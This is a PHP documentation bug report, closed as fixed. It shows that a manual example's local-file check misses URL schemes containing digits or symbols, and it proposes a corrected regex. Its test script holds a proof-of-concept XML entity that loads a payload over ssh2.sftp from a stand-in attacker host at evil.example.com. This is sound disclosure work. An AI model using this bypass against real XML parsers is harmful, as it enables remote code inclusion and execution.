Doc #68368 [Opn->Csd]: Insecure example
| From: | aharvey@php.net | Date: | Fri, 07 Nov 2014 10:59:34 +0000 |
| Subject: | Doc #68368 [Opn->Csd]: Insecure example | ||
| References: | 1 | Groups: | php.doc.bugs |
| Request: | Send a blank email to doc-bugs+get-11618@lists.php.net to get a copy of this message | ||
Edit report at https://bugs.php.net/bug.php?id=68368&edit=1
ID: 68368
Updated by: aharvey@php.net
Reported by: clicky at erebot dot net
Summary: Insecure example
-Status: Open
+Status: Closed
Type: Documentation Problem
Package: Documentation problem
Operating System: irrelevant
PHP Version: Irrelevant
-Assigned To:
+Assigned To: aharvey
Block user comment: N
Private report: N
New Comment:
This bug has been fixed in the documentation's XML sources. Since the
online and downloadable versions of the documentation need some time
to get updated, we would like to ask you to be a bit patient.
Thank you for the report, and for helping us make our documentation better.
Thank you very much! I've changed it as you suggest.
Previous Comments:
------------------------------------------------------------------------
[2014-11-07 10:59:29] aharvey@php.net
Automatic comment from SVN on behalf of aharvey
Revision: http://svn.php.net/viewvc/?view=revision&revision=335165
Log: Change the XML parser external entity example, as suggested by clicky.
Fixes doc bug #68368 (Insecure example).
------------------------------------------------------------------------
[2014-11-06 23:33:17] clicky at erebot dot net
Description:
------------
---
From manual page: http://www.php.net/example.xml-external-entity
---
function trustedFile($file)
{
// only trust local files owned by ourselves
if (!preg_match("@^([a-z]+)\:\/\/@i", $file)
&& fileowner($file) == getmyuid()) {
return true;
}
return false;
}
---
This function is not secure as it does not handle schemes containing special characters (digits,
'+', '.' or '-') in them. In some circumstances, PHP may define URL
wrappers with such names, eg. when the SSH2 extension is installed.
Test script:
---------------
One way to pass the trustedFile() checks is to load a remote file using SFTP by replacing the
following line in xmltest.xml :
<!ENTITY systemEntity SYSTEM "xmltest2.xml">
with:
<!ENTITY systemEntity SYSTEM "ssh2.sftp://user:pass@evil.example.com/payload.xml">
Also, since the ssh2.sftp wrapper supports stat() calls, it is possible to craft a remote file such
that its owner UID matches the current script's owner UID.
Based on RFC 3986, this issue can be trivially fixed by changing the regex to:
"@^([a-z][a-z0-9+.-]*)\:\/\/@i"
Expected result:
----------------
Even though the code given on that page is only an example, it could be interpreted as guidance
towards secure parsing of XML documents. Plus, the code specifically says that only local files are
"trusted".
I would thus expect it to reject attempts to include and execute code from remote resources.
Actual result:
--------------
<CHAPTER>
<TITLE>Title &plainEntity;</TITLE>
<PARA>
<INFORMALTABLE>
<TGROUP COLS="3">
<TBODY>
<ROW><ENTRY>a1</ENTRY><ENTRY
MOREROWS="1">b1</ENTRY><ENTRY>c1</ENTRY></ROW>
<ROW><ENTRY>a2</ENTRY><ENTRY>c2</ENTRY></ROW>
<ROW><ENTRY>a3</ENTRY><ENTRY>b3</ENTRY><ENTRY>c3</ENTRY></ROW>
</TBODY>
</TGROUP>
</INFORMALTABLE>
</PARA>
<FOO>
<ELEMENT ATTRIB="value"></ELEMENT>
&testEnt;
This is some more PHP code being executed.
</FOO>
<SECTION ID="about">
<TITLE>About this Document</TITLE>
<PARA>
<!-- this is a comment -->
Hi! This is PHP version 5.4.33
</PARA>
</SECTION>
</CHAPTER>XML error: Invalid URI at line 28
(note: the "XML error" at the end is triggered by the use of a path to a non-existent DTD
in xmltest.xml on line 2 [/just/a/test.dtd] and is not related to this bug)
------------------------------------------------------------------------
--
Edit this bug report at https://bugs.php.net/bug.php?id=68368&edit=1